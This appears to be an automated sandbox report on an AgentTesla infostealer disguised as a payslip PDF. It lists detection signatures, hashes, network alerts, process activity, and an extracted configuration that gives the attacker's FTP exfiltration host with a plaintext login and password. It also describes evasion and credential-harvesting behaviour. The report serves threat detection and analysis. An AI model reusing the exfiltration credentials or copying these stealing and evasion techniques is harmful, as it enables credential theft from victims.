Windows Analysis Report
Payslip_October_2024_pdf.exe

Overview

General Information

Sample name: Payslip_October_2024_pdf.exe
Analysis ID: 1548311
MD5: 0d4985c828f3f9f6974b1602c92ee962
SHA1: 0f11a5deef40a3dec6cb8cb0cc6ae057bd56c2dd
SHA256: 59cbe4e681c4371b18a5f6d457369560ce9e4f0eda5a39de1acab8b5bdf73bda
Tags: AgentTesla, exe, user-threatcat_ch
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • sgxIb.exe (PID: 432 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
    • sgxIb.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
  • sgxIb.exe (PID: 6192 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
    • sgxIb.exe (PID: 2800 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | Strings:
  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | Strings:
  • 0x30370:$s2: GetPrivateProfileString
  • 0x2f9fa:$s3: get_OSFullName
  • 0x3116b:$s5: remove_Key
  • 0x31357:$s5: remove_Key
  • 0x32275:$s6: FtpWebRequest
  • 0x3315e:$s7: logins
  • 0x336d0:$s7: logins
  • 0x36427:$s7: logins
  • 0x36493:$s7: logins
  • 0x37f12:$s7: logins
  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
5.2.sgxIb.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe, ProcessId: 528, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T10:13:19.167320+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49717 | TCP
2024-11-04T10:13:58.256553+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49929 | TCP
2024-11-04T10:13:19.381403+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 110.4.45.197 | 21 | TCP
2024-11-04T10:13:27.924804+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 110.4.45.197 | 21 | TCP
2024-11-04T10:13:20.357961+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 110.4.45.197 | 61813 | TCP
2024-11-04T10:13:20.363581+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 110.4.45.197 | 61813 | TCP
2024-11-04T10:13:28.852402+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49766 | 110.4.45.197 | 64083 | TCP
2024-11-04T10:13:28.863602+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49766 | 110.4.45.197 | 64083 | TCP

AV Detection

Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, ReversingLabs: Detection: 34%
Source: Payslip_October_2024_pdf.exe, ReversingLabs: Detection: 34%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Joe Sandbox ML: detected
Source: Payslip_October_2024_pdf.exe, Joe Sandbox ML: detected
Source: Payslip_October_2024_pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: Payslip_October_2024_pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: eopJ.pdb source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr
Source: Binary string: eopJ.pdbSHA256 source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr
Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe, Code function: 4x nop then jmp 06D1B7C8h, 0_2_06D1B06B
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Code function: 4x nop then jmp 0B3CB7C8h, 4_2_0B3CB06B

Networking

Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49722 -> 110.4.45.197:61813
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49766 -> 110.4.45.197:64083
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49716 -> 110.4.45.197:21
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49745 -> 110.4.45.197:21
Source: global traffic, TCP traffic: 110.4.45.197 ports 62073,63363,49933,62375,64015,65027,56294,58054,58497,57320,56137,52591,54378,50752,53227,53903,49628,65335,58781,64647,58161,61813,1,2,61927,50066,53852,53156,57499,60003,53855,53556,51512,53414,64083,49362,56946,21
Source: Yara match, File source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.5:49712 -> 110.4.45.197:53855
Source: Joe Sandbox View, IP Address: 110.4.45.197
Source: Joe Sandbox View, IP Address: 172.67.74.152
Source: Joe Sandbox View, ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49717
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49929
Source: unknown, FTP traffic detected: 110.4.45.197:21 -> 192.168.2.5:49709
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 26 of 50 allowed.
  220-Local time is now 17:13. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: ftp.haliza.com.my
Source: Payslip_October_2024_pdf.exe, sgxIb.exe, String found in binary or memory: http://ftp.haliza.com.my
Source: Payslip_October_2024_pdf.exe, sgxIb.exe, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payslip_October_2024_pdf.exe, sgxIb.exe, String found in binary or memory: https://account.dyn.com/
Source: Payslip_October_2024_pdf.exe, sgxIb.exe, String found in binary or memory: https://api.ipify.org
Source: sgxIb.exe, String found in binary or memory: https://api.ipify.org/
Source: sgxIb.exe, String found in binary or memory: https://api.ipify.org/t
Source: unknown, Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown, Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, SKTzxzsJw.cs, .Net Code: _71ZRqC1D
Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe, Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: initial sample, Static PE information: Filename: Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033211026.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2045308094.00000000077C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2032307215.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000000.2022449219.0000000000582000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameeopJ.exe. vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4490410074.00000000009E9000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe Binary or memory string: OriginalFilenameeopJ.exe. vs Payslip_October_2024_pdf.exe
                    Source: Payslip_October_2024_pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Payslip_October_2024_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sgxIb.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, HhRnp80YNIZjcH3iKc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, HhRnp80YNIZjcH3iKc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, HhRnp80YNIZjcH3iKc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.cs Security API names: _0020.AddAccessRule
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/4@2/2
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payslip_October_2024_pdf.exe.log
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Mutant created: NULL
                    Source: Payslip_October_2024_pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000000.2022449219.0000000000582000.00000002.00000001.01000000.00000003.sdmp, sgxIb.exe.3.dr Binary or memory string: SELECT mv.code, mv.title, mv.image, gr.description AS genre, mv.year, mv.seconds, mv.membership_types_id AS id, mv.description, mv.code AS code2 FROM movies_record mr INNER JOIN movies mv ON (mv.code = mr.movie_code) INNER JOIN genres gr ON (mv.genre_id = gr.id) ;WHERE mr.membership_id = {0}
                    Source: Payslip_October_2024_pdf.exe ReversingLabs: Detection: 34%
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe File read: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                    Source: unknown Process created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Process created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Payslip_October_2024_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payslip_October_2024_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Payslip_October_2024_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: eopJ.pdb source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr
                    Source: Binary string: eopJ.pdbSHA256 source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr

                    Data Obfuscation

                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, VoothtBB9ZTWwF5DWY.cs - .Net Code: AbTT8O94en System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024_pdf.exe.54b0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs - .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
